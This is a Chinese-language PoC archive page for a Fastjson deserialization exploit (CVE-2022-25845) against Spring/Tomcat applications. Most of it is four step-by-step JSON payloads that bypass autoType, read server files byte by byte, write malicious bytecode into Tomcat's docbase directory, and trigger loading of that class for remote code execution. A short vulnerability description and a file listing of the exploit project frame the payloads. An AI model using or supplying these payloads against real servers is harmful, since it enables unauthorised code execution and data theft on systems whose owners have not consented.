POC详情: 2941fa39d403266a8b9de7e6359c55745b63dce1

来源
关联漏洞
标题: Fastjson 代码问题漏洞 (CVE-2022-25845)
描述:Fastjson是一款基于Java的快速JSON解析器/生成器。 Fastjson 1.2.83 之前版本存在安全漏洞,该漏洞源于容易绕过默认的 autoType 关闭限制来反序列化不受信任的数据,攻击者利用该漏洞可以攻击远程服务器。
描述
CVE-2022-25845(fastjson1.2.80) exploit in Spring Env!
介绍
# CVE-2022-25845-In-Spring

# 主要依赖
1. jackson
2. commons-io

# 快速复现

1. idea导入项目 build ```mvn install```
2. Dockerfile build && run ```docker build .```
3. 运行src/test/java/POC.java 执行touch /tmp/pwned命令


# 利用说明

## Step1: 把java.io.InputStream 加入 fastjson autotype 缓存

```json
{
  "a": "{    \"@type\": \"java.lang.Exception\",    \"@type\": \"com.fasterxml.jackson.core.exc.InputCoercionException\",    \"p\": {    }  }",
  "b": {
    "$ref": "$.a.a"
  },
  "c": "{  \"@type\": \"com.fasterxml.jackson.core.JsonParser\",  \"@type\": \"com.fasterxml.jackson.core.json.UTF8StreamJsonParser\",  \"in\": {}}",
  "d": {
    "$ref": "$.c.c"
  }
}
```

![截屏2024-11-07 21.36.27](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.36.27.png)

## Step2: file协议读取/tmp内容,获取tomcat的docbase文件名称

> 逐字节读取内容

```json
{
  "a": {
    "@type": "java.io.InputStream",
    "@type": "org.apache.commons.io.input.BOMInputStream",
    "delegate": {
      "@type": "org.apache.commons.io.input.BOMInputStream",
      "delegate": {
        "@type": "org.apache.commons.io.input.ReaderInputStream",
        "reader": {
          "@type": "jdk.nashorn.api.scripting.URLReader",
          "url": "${file}"
        },
        "charsetName": "UTF-8",
        "bufferSize": "1024"
      },
      "boms": [
        {
          "charsetName": "UTF-8",
          "bytes": ${data}
        }
      ]
    },
    "boms": [
      {
        "charsetName": "UTF-8",
        "bytes": [1]
      }
    ]
  },
  "b": {"$ref":"$.a.delegate"}
}
```

![截屏2024-11-07 21.35.56](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.56.png)

## Step3: 写入恶意字节码到docbase目录下

```json
{
  "a": {
    "@type": "java.io.InputStream",
    "@type": "org.apache.commons.io.input.AutoCloseInputStream",
    "in": {
      "@type": "org.apache.commons.io.input.TeeInputStream",
      "input": {
        "@type": "org.apache.commons.io.input.CharSequenceInputStream",
        "cs": {
          "@type": "java.lang.String"
          "${shellcode}",
          "charset": "iso-8859-1",
          "bufferSize": ${size}
        },
        "branch": {
          "@type": "org.apache.commons.io.output.WriterOutputStream",
          "writer": {
            "@type": "org.apache.commons.io.output.LockableFileWriter",
            "file": "${file2write}",
            "charset": "iso-8859-1",
            "append": true
          },
          "charset": "iso-8859-1",
          "bufferSize": 1024,
          "writeImmediately": true
        },
        "closeBranch": true
      }
    },
    "b": {
      "@type": "java.io.InputStream",
      "@type": "org.apache.commons.io.input.ReaderInputStream",
      "reader": {
        "@type": "org.apache.commons.io.input.XmlStreamReader",
        "inputStream": {
          "$ref": "$.a"
        },
        "httpContentType": "text/xml",
        "lenient": false,
        "defaultEncoding": "iso-8859-1"
      },
      "charsetName": "iso-8859-1",
      "bufferSize": 1024
    },
    "c": {}
  }
```

![截屏2024-11-07 21.37.04](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.37.04.png)

## Step4: 触发恶意类加载

```json
{
  "@type":"java.lang.Exception",
  "@type":"com.chenzai.HackException"
}
```

![截屏2024-11-07 21.35.32](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.32.png)

# 参考/致谢

- [GeekCon 2024](https://www.geekcon.top/js/pdfjs/web/viewer.html?file=/doc/ppt/GC24_SpringBoot之殇.pdf)
- jsjcw

文件快照

[4.0K] /data/pocs/2941fa39d403266a8b9de7e6359c55745b63dce1 ├── [ 143] Dockerfile ├── [4.0K] images │   ├── [646K] 截屏2024-11-07 21.34.52.png │   ├── [658K] 截屏2024-11-07 21.35.19.png │   ├── [486K] 截屏2024-11-07 21.35.32.png │   ├── [382K] 截屏2024-11-07 21.35.56.png │   ├── [349K] 截屏2024-11-07 21.36.27.png │   └── [389K] 截屏2024-11-07 21.37.04.png ├── [4.0K] payloads │   ├── [ 365] step1.json │   ├── [ 695] step2.json │   ├── [1.3K] step3.json │   └── [ 74] step4.json ├── [1.9K] pom.xml ├── [3.4K] README.md └── [4.0K] src ├── [4.0K] main │   └── [4.0K] java │   └── [4.0K] org │   └── [4.0K] example │   ├── [ 285] App.java │   └── [4.0K] controller │   └── [ 349] JSONController.java └── [4.0K] test └── [4.0K] java └── [4.8K] POC.java 10 directories, 16 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。